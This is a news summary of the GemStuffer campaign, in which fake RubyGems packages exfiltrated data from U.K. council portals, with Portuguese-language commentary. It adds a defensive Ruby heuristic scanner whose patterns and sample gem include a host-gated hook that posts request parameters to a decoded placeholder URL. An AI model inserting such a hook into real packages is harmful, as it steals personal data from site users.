Hackers uploaded 150+ fake RubyGems packages to steal data from U.K. council websites, not to hack developers.
- Hackers uploaded 152 fake RubyGems packages to steal data from U.K. council portals
- The GemStuffer campaign avoided malware to focus on data exfiltration instead
- Most packages had almost no downloads, suggesting targeted attacks on specific portals
Security firm Socket first spotted the GemStuffer campaign after scanning the RubyGems registry for suspicious packages. They found 152 gems designed not to spread malware, but to quietly scrape and exfiltrate data from U.K. local council web portals. Unlike typical supply-chain attacks, these packages didn’t try to infect developers’ machines. Instead, they acted as data mules, pulling information from the sites where they were installed and sending it back to attacker-controlled servers.
The packages looked harmless at first glance. Many had no downloads or just a handful, suggesting they weren’t meant for mass compromise. Instead, they targeted specific council portals that used Ruby libraries. Once installed, the gems would scrape user inputs, session data, or other sensitive details and transmit them to external domains controlled by the attackers. Socket noted the payloads were repetitive—each package used similar obfuscation techniques and command-and-control infrastructure.
How the attack slipped through the cracks
RubyGems, like other package registries, relies on automated scans to catch malicious uploads. But GemStuffer’s approach avoided many red flags. The packages didn’t include executable code that could trigger alerts. Instead, they used legitimate-looking dependencies and included subtle hooks to activate the data-stealing logic only when certain conditions were met—like detecting a specific council portal URL.
Experts say this tactic mirrors a shift in cybercrime. Hackers are moving away from noisy malware campaigns toward quiet data theft. By reusing the same obfuscation methods across multiple packages, the attackers made detection harder. Socket’s report highlights that even small, low-activity packages can be part of a larger operation if they’re dropped into the right environment.
Who’s at risk and what’s next
The primary targets appear to be U.K. local councils, which often host portals for services like housing, benefits, and planning applications. These sites process sensitive personal data, making them attractive to cybercriminals. While the full scope of the breach isn’t clear, the use of 152 separate packages suggests a coordinated effort to target multiple councils at once.
RubyGems has already removed the malicious packages after being alerted by Socket. But the incident raises questions about how package registries can better detect subtle abuse. Some security teams argue registries need stricter vetting, especially for packages that look inactive or have niche uses. Others point to the need for better detection at the application level—councils should audit third-party libraries more closely.
For developers, the lesson is simple: even seemingly harmless packages can carry hidden risks. Always check dependencies, monitor network traffic, and use tools like Socket or Dependabot to catch unusual behavior. The GemStuffer campaign proves that attackers don’t need flashy malware to do damage—they just need access.
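To make the two technical points above concrete (trigger logic gated on a specific portal host, and the advice to audit third-party libraries), here is an added Ruby example, written for this summary and not taken from the article or from Socket, that scores a gem's source for the combination of traits described: a host-gated condition, access to request data, an outbound network call, decode/eval obfuscation, and a near-zero download count. The signal patterns, the download threshold and the sample gem sources are constructed assumptions, not a published detection rule.

```ruby
# Added example (not from the article or Socket): heuristic static review of
# installed gems for the traits described above. Patterns and threshold are
# assumptions chosen for illustration, not a published detection rule.
SIGNALS = {
  egress:      /\b(Net::HTTP|TCPSocket|URI\.open|Faraday|HTTParty)\b/,
  host_gate:   /request\.(host|url|base_url)\s*(==|=~|\.(include\?|end_with\?|start_with\?|match\?))/,
  data_access: /\b(params|session|cookies|request\.(body|raw_post|headers))\b/,
  obfuscation: /\b(Base64\.decode64|eval|instance_eval)\b/
}.freeze

LOW_DOWNLOAD_THRESHOLD = 20 # assumed cut-off for "almost no downloads"

# Rank: a host check + request data + outbound call is the full exfil chain;
# decode/eval on top of it, or egress from a near-zero-download gem, raises it.
def severity_for(hits)
  exfil_chain = %i[host_gate data_access egress].all? { |s| hits.include?(s) }
  return hits.include?(:obfuscation) ? :high : :medium if exfil_chain
  return :medium if hits.include?(:egress) && (hits & %i[obfuscation low_downloads]).any?
  (hits - [:low_downloads]).empty? ? :none : :low
end

# gem_info: { name:, downloads:, source: }; in practice source is the
# concatenation of the .rb files under Gem::Specification#full_gem_path.
def scan_gem(gem_info)
  hits = SIGNALS.select { |_, re| gem_info[:source].match?(re) }.keys
  hits << :low_downloads if gem_info[:downloads] < LOW_DOWNLOAD_THRESHOLD
  { name: gem_info[:name], signals: hits, severity: severity_for(hits) }
end

def scan_all(gems)
  gems.map { |g| scan_gem(g) }.reject { |r| r[:severity] == :none }
end

# Constructed sample gem sources; PLACEHOLDER values stand in for real strings.
SUSPECT_SRC = <<~SRC
  require "net/http"
  require "base64"
  if request.host.end_with?("PLACEHOLDER-COUNCIL-DOMAIN")
    Net::HTTP.post(URI(Base64.decode64("PLACEHOLDER")), params.to_json)
  end
SRC
SAMPLE_GEMS = [
  { name: "tidy-logger", downloads: 5_000, source: "require 'logger'\nLOG = Logger.new($stdout)\n" },
  { name: "council-forms-helper", downloads: 3, source: SUSPECT_SRC },
  { name: "http-retry", downloads: 900, source: "require 'net/http'\nNet::HTTP.get(URI('https://example.com'))\n" }
].freeze

scan_all(SAMPLE_GEMS).each { |r| puts "#{r[:name]}: #{r[:severity]} #{r[:signals].join(',')}" } if $PROGRAM_NAME == __FILE__
```

Against a real installation you would feed each gem's concatenated .rb files plus its registry download count; the result is a triage list for manual review, not proof of compromise.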
What You Need to Know
- Source: The Hacker News
- Published: May 13, 2026 at 08:08 UTC
- Category: Security
- Topics: #hackernews · #security · #vulnerabilities · #cybersecurity · #stuffer-abuses · #ruby
All reporting rights belong to the respective author(s) at The Hacker News. GlobalBR News summarizes publicly available content to help readers discover the most relevant global news.
Curated by GlobalBR News · May 13, 2026
🇧🇷 Summary in Portuguese
Cybercriminals are using a sophisticated technique to steal sensitive data from British local-government portals, deceiving developers and even security systems with more than 150 fake packages on RubyGems, the library repository for the Ruby language. The discovery, made by security researchers, exposes how attackers are increasingly infiltrating software supply chains for targeted attacks, a risk that does not spare even public institutions abroad.
In Brazil, where adoption of languages such as Ruby and JavaScript-based frameworks is growing in the public and private sectors, the case serves as a warning about the vulnerability of development pipelines. Many organizations still underestimate the risks of third-party packages, which can contain malicious code capable of extracting confidential information or even planting backdoors. Brazilian experts had already mapped similar cases, such as the contamination of npm libraries with malware in government and corporate projects, reinforcing the need for rigorous audits and automated detection tools.
The Federal Police and the ANPD (Autoridade Nacional de Proteção de Dados, the National Data Protection Authority) should accelerate the drafting of specific guidelines to mitigate these risks, while companies and public bodies are urged to review their systems urgently for suspicious packages.